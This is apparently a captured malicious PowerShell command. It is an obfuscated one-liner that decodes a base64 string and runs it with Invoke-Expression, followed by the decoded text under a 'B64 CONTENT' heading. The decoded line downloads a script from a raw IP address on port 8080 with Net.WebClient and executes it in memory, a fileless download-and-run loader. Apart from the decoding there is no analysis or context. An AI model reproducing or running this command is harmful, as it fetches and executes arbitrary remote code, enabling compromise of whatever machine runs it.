iex([sYsTEM.tExT.enCODinG]::utf8.geTstriNg([SYStEm.COnVeRT]::Frombase64strIng('CklFWCAoKE5ldy1PYmplY3QgbkV0LldFQmNMSWVuVCkuRG93bkxPQWRzdHJpbmcoJ2h0dHA6Ly85My4xNzEuMjA1LjM1OjgwODAvJykpOwoK')));exit

##### B64 CONTENT #####


IEX ((New-Object nEt.WEBcLIenT).DownLOAdstring('http://93.171.205.35:8080/'));

